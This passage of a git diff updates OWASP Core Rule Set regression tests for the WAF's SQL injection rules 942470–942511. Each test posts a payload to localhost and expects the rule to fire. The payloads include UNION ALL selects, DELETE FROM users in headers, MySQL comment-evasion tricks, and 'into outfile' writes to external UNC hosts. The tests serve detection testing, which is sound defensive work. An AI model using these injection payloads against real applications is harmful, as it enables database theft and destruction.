HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=xp_regread" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-6 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=sp_password" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sp_password" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-7 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=UTL_HTTP" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=UTL_HTTP" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-8 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=OPENROWSET" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-9 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=OPENROWSET" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-9 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=sp_executesql" - version: HTTP/1.0 - output: - log_contains: id "942470" - - - test_title: 942470-10 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sp_executesql" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-10 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "sp_executesql" - version: HTTP/1.0 - output: - log_contains: id "942470" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "sp_executesql" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-11 + desc: "SQL Injection Attack: current_user" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=1%2bcurrent_user::int" + version: HTTP/1.0 + output: + log_contains: id "942470" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml index 28f5baca0e..645657712f 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml @@ -1,43 +1,210 @@ --- - meta: - author: "Jose Nazario" - description: None - enabled: true - name: 942480.yaml - tests: - - - test_title: 942480-1 +meta: + author: "Jose Nazario" + description: None + enabled: true + name: 942480.yaml +tests: + - test_title: 942480-1 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - method: GET - port: 80 - # variable name boundary attacks - uri: "/?'msdasql'" - version: HTTP/1.0 - output: - log_contains: "id \"942480" - - - test_title: 942480-2 + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # variable name boundary attacks + uri: "/?'msdasql'" + version: HTTP/1.0 + output: + log_contains: "id \"942480" + - test_title: 942480-2 desc: "SQL Injection Attack" stages: - - - stage: - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - # variable name boundary attacks - Cookie: "'msdasql'" - method: POST - port: 80 - version: HTTP/1.0 - output: - log_contains: "id \"942480" + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + # variable name boundary attacks + Cookie: "'msdasql'" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + version: HTTP/1.0 + output: + log_contains: "id \"942480" + - test_title: 942480-3 + desc: "Data dump using 'into outfile'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-4 + desc: "Data dump using 'into outfile'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=/config.ini' into outfile '\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-5 + desc: "SQL injection using 'UNION ALL" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=0.3480567293179807' UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-6 + desc: "SQL injection using 'UNION ALL" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=config.ini\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-7 + desc: "SQL injection using 'UNION ALL" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=CRS) UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-8 + desc: "SQL injection using 'UNION ALL" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=CRS3\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-9 + desc: "SQL injection using 'overlay(...placing..)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-10 + desc: "SQL injection in User-Agent" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-11 + desc: "SQL injection in arbitrary header" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + SomeHeader: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-12 + desc: "SQL injection using 'overlay(...placing..) with newlines" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" + version: HTTP/1.0 + output: + log_contains: id "942480" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml index 95c9064898..d02e17800d 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml @@ -1,380 +1,380 @@ --- - meta: - author: "Christoph Hansen" - description: None - enabled: true - name: 942490.yaml - tests: - - - test_title: 942490-1 +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942490.yaml +tests: + - test_title: 942490-1 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - data: "var=%22%60%20%2A%20123" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-2 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%22%60%20%2A%20123" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-2 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "' ', 10" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-3 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "' ', 10" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-3 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "'', '', '', '', '', '', '', '', 13" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-4 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "'', '', '', '', '', '', '', '', 13" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-4 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "`>65" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-5 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "`>65" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-5 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay='1001'='10" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-6 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='1001'='10" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-6 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "\x222562*23" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-7 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\"2562*23" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-7 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=\x22:[\x2200" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-8 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=\":[\"00" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-8 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=`>6fbdec2" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-9 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=`>6fbdec2" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-9 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay='][0]]), strtolower($b[$GLOBALS['" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-10 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='][0]]), strtolower($b[$GLOBALS['" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-10 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=', 2, 1" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-11 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=', 2, 1" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-11 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "`>9e7" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-12 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "`>9e7" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-12 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=\x22:\x2265" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-13 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=\":\"65" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-13 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay='\\2nq5" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-14 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='\\2nq5" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-14 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=` < 0) AND `" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-15 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=` < 0) AND `" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-15 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay='0:0:6" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-16 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='0:0:6" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-16 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "\x22:60" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-17 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\":60" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-17 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay=\x22>%5 - type_submit_reset_5" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-18 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=\">%5 - type_submit_reset_5" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-18 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "\x22:35" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-19 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\":35" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-19 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay='3085'='30" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-20 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='3085'='30" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-20 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "\x22:\x22[0,\\x22" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-21 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\":\"[0,\\x22" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-21 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "pay='16/17" - version: HTTP/1.0 - output: - log_contains: id "942490" - - - test_title: 942490-22 + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay='16/17" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-22 desc: "classic SQL injection probings 3/3" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "/" - data: "\x22;}7b6" - version: HTTP/1.0 - output: - log_contains: id "942490" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "\";}7b6" + version: HTTP/1.0 + output: + log_contains: id "942490" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml index 558e49d32b..7b18c9e1c4 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml @@ -1,23 +1,85 @@ --- - meta: - author: "Franziska Buehler" - description: None - enabled: true - name: 942500.yaml - tests: - - - test_title: 942500-1 - desc: "MySQL in-line comment detection" +meta: + author: "Franziska Buehler, Max Leske" + description: "Detection of MySQL injection evasion attempts using special comments" + enabled: true + name: 942500.yaml +tests: + - test_title: 942500-1 + desc: "Use of portability comment (/*!...*/) as evasion technique" stages: - - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - method: POST - port: 80 - uri: "?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" - version: HTTP/1.0 - output: - log_contains: id "942500" + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log_contains: id "942500" + - test_title: 942500-2 + desc: "Use of portability comment (/*!...*/) as evasion technique, with space before !" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log_contains: id "942500" + - test_title: 942500-3 + desc: "Use of optimizer hints (/*+...*/) as evasion technique" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" + output: + log_contains: id "942500" + - test_title: 942500-4 + desc: "Use of optimizer hints (/*+...*/) as evasion technique with space before +" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" + output: + log_contains: id "942500" + - test_title: 942500-5 + desc: "Status Page Test - MySQL inline comment detected" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/?test=9999+or+{if+length((/*!5000select+username/*!comment*/" + version: HTTP/1.0 + output: + log_contains: id "942500" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml index 13bd384596..a57e20af68 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml @@ -12,8 +12,9 @@ tests: input: dest_addr: 127.0.0.1 headers: - User-Agent: "ModSecurity CRS 3 Tests" + User-Agent: "OWASP CRS test agent" Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 uri: "/?`bla`" @@ -27,8 +28,9 @@ tests: input: dest_addr: 127.0.0.1 headers: - User-Agent: "ModSecurity CRS 3 Tests" + User-Agent: "OWASP CRS test agent" Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 uri: "/?'bla'" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml index 0712bb944f..797947b690 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml @@ -12,8 +12,9 @@ tests: input: dest_addr: 127.0.0.1 headers: - User-Agent: "ModSecurity CRS 3 Tests" + User-Agent: "OWASP CRS test agent" Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 method: GET port: 80 uri: "/?`bla`" @@ -27,8 +28,9 @@ tests: input: dest_addr: 